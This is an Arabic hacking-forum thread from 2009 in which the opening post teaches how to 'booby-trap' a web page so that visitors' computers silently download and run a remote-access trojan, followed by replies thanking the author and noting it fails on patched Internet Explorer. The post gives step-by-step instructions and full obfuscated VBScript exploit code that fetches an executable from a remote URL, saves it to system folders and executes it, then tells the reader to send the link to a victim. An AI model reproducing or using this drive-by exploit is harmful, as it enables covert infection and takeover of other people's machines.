شرح كيفية تلغيم صفحة انترنت بباتش

الموضوع في 'حماية الأجهزة' بواسطة AnTiviRus7, بتاريخ ‏25 يوليو 2009.

تم تحميل الصفحة في 0,8281491 ثانية
حالة الموضوع:
مغلق
  1. AnTiviRus7

    AnTiviRus7 VIP DeveloPer

    إنضم إلينا في:
    ‏23 يوليو 2009
    المشاركات:
    8,266
    الإعجابات المتلقاة:
    3,538
    نقاط الجائزة:
    0
    Credits:
    0
    شرح كيفية تلغيم صفحة انترنت بباتش

    :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

    صفحة الانترنت الملغمه بباتش ماتشتغل الا على ماسووا تحديثات للنظام
    وبعض الثغرات تتخطى التحديثات بس ماتتخطى جميع التحديثات ونادرا تتخطى جميع التحديثات
    ........................................................................
    فكرة الصفحه الملغمه بباتش : عباره عن صفحه مبرمجه بلغة html او php تضع بوسطها رابط باتشك المباشر واذا دخل اي واحد على الصفحه راح ينزل الباتش بجهازه ويشتغل بدون مايحس ..... وبكذا راح تخترقه...
    مثل: صفحه ملغمه بباتش وتكون فاضيه بيضا ..
    ومثل : صفحه ملغمه بباتش وبوسطها صوره ( اذا فتح الضحيه الصفحه راح تطلع له الصوره ) ..
    .....................................................................
    اول خطوه نرفع الباتش على موقع رفع مثل RipWay.com
    ثانيا نفتح الثغره بالمفكره
    بعدها نستبدل اللي موضح لنا برابط الباتش المرفوع
    http://www.site.com/server.exe
    واذا كانت فيه صوره نحط رابط اي صوره تعجبك نستبدل هذا الرابط برابط الصوره
    http://www.site.com/image.jpg
    ونحفظها بصيغة html
    مثلا نكتب الاسم index.html
    ...........................................................................
    بعدها نرفع الصفحه الملغمه الى موقعك الخاص ونعطي الرابط الضحيه.....

    نجرب الثغره
    <html>
    <head>
    <title>Exploit-Pro</title>
    </head>
    <body>
    <script type="text/vbscript">
    on error resume next
    Set df = document.createElement("object")
    df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
    str="Microsoft"&"."&"XMLHTTP"
    Set x = df.CreateObject(str,"")
    var1="Ad"
    var2="od"
    var3="b."
    var4="St"
    var5="re"
    var6="am"
    str1=var1&var2&var3&var4&var5&var6

    str5=str1
    set S = df.createobject(str5,"")
    for count = 0 to 4
    S.type = 1
    lnk="هنا نضع برابط الباتش المرفوع "
    x.Open "G"&"E"&"T",lnk,0
    x.Send
    set F = df.createobject("Script"&"ing.FileSys"&"temObject","")
    if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
    fname1= F.BuildPath(tmp,"\svacm.exe")
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    if err.number = 0 then
    set Q = df.createobject("****l.Application","")
    Q.****lExecute fname1,"INSTALL","","open",0
    exit for
    else
    Err.Clear
    End if
    next
    </script>
    </body>
    </html>

    <head>
    <img border="0" src=" برابط الصوره هنا نضع"
    <hr>
    <!-- **********location.href='http://google.com'</script> -->
    </body>

    </html>

    ونحفظها بصيغة html

    ونواصل كما في الشرح................................finish.



    [​IMG]
     
    2 شخص معجب بهذا.
  2. Đ.ẂĬńĎ-ًِXَp

    Đ.ẂĬńĎ-ًِXَp DeveloPer Plus

    إنضم إلينا في:
    ‏6 مايو 2009
    المشاركات:
    1,710
    الإعجابات المتلقاة:
    160
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    مشكور حبيب قلبي وعلى البركه تغير الموضوع
     
    1 person likes this.
  3. sn!per al3nzi

    sn!per al3nzi ExpErt DeveloPer

    إنضم إلينا في:
    ‏4 ديسمبر 2008
    المشاركات:
    2,682
    الإعجابات المتلقاة:
    118
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    يعطيك العافية يا بطل
    وتشكر على الثغرة والشرح الجميل

    ][ جــأإري الــتــقــيــيـمـ ][


    ســـــــــــلأإأإمـ
     
  4. الســـوفـي

    الســـوفـي ExpErt DeveloPer

    إنضم إلينا في:
    ‏24 يوليو 2009
    المشاركات:
    2,648
    الإعجابات المتلقاة:
    395
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    شكرا لك اخي على تاتغيير موضوع رائع:6:​
     
  5. الســـوفـي

    الســـوفـي ExpErt DeveloPer

    إنضم إلينا في:
    ‏24 يوليو 2009
    المشاركات:
    2,648
    الإعجابات المتلقاة:
    395
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    يا اخوة جربة طريقة ما جني التبليغ
     
  6. AnTiviRus7

    AnTiviRus7 VIP DeveloPer

    إنضم إلينا في:
    ‏23 يوليو 2009
    المشاركات:
    8,266
    الإعجابات المتلقاة:
    3,538
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش


    انا مجرب الطريقة اخي انتيه جيدا عند وضع رابط السرفير
     
  7. اللواء الهاكر

    اللواء الهاكر Developer

    إنضم إلينا في:
    ‏11 يونيو 2009
    المشاركات:
    339
    الإعجابات المتلقاة:
    26
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    تسلم ايدك طريقة حلوة وعملية
     
  8. 4math

    4math DeveloPer Plus

    إنضم إلينا في:
    ‏3 ابريل 2009
    المشاركات:
    1,255
    الإعجابات المتلقاة:
    64
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    حبيبي لو محدث الانترنت اكسبلورر ما تشتغل معاك


    شكرا لصاحب الموضوع
     
  9. Mr.dunhill

    Mr.dunhill ExpErt DeveloPer

    إنضم إلينا في:
    ‏21 يونيو 2009
    المشاركات:
    4,276
    الإعجابات المتلقاة:
    382
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    يعطيك العافيه بس لو نسقته كان احسن
     
  10. CaSp£r SpY

    CaSp£r SpY Developer

    إنضم إلينا في:
    ‏29 ديسمبر 2009
    المشاركات:
    180
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    مشكوووور اخي الكريم والله طريقة رائعة
     
  11. Ďŕ.ŤřőЈàή

    Ďŕ.ŤřőЈàή VIP DeveloPer

    إنضم إلينا في:
    ‏28 أكتوبر 2009
    المشاركات:
    2,923
    الإعجابات المتلقاة:
    1,124
    نقاط الجائزة:
    113
    Credits:
    10
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    ما جاني وعجبني الموضوع بس ياريت تعمل اكتباس للكود او يرفع علي موقع ومشكور :24:
     
  12. AnTiviRus7

    AnTiviRus7 VIP DeveloPer

    إنضم إلينا في:
    ‏23 يوليو 2009
    المشاركات:
    8,266
    الإعجابات المتلقاة:
    3,538
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    تآريخ كتآبة الموضوع

    Jul-2009-25
    05:06 AM
    :)
     
  13. Ďŕ.ŤřőЈàή

    Ďŕ.ŤřőЈàή VIP DeveloPer

    إنضم إلينا في:
    ‏28 أكتوبر 2009
    المشاركات:
    2,923
    الإعجابات المتلقاة:
    1,124
    نقاط الجائزة:
    113
    Credits:
    10
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    والله انا مستني انا عايز الكود في تكست :27:
     
  14. Ďŕ.ŤřőЈàή

    Ďŕ.ŤřőЈàή VIP DeveloPer

    إنضم إلينا في:
    ‏28 أكتوبر 2009
    المشاركات:
    2,923
    الإعجابات المتلقاة:
    1,124
    نقاط الجائزة:
    113
    Credits:
    10
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    :2: الاف 5 باظ عندي من كتر الكلك عليه ياريت تعدل السورس :28:
     
  15. winfil

    winfil Beginner Developer

    إنضم إلينا في:
    ‏6 نوفمبر 2009
    المشاركات:
    23
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش

    exploit not working
     
    1 person likes this.
  16. AnTiviRus7

    AnTiviRus7 VIP DeveloPer

    إنضم إلينا في:
    ‏23 يوليو 2009
    المشاركات:
    8,266
    الإعجابات المتلقاة:
    3,538
    نقاط الجائزة:
    0
    Credits:
    0
    رد: شرح كيفية تلغيم صفحة انترنت بباتش


    يا أخي الكريم الموضوع قديم جويلية 2009

    :32:
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...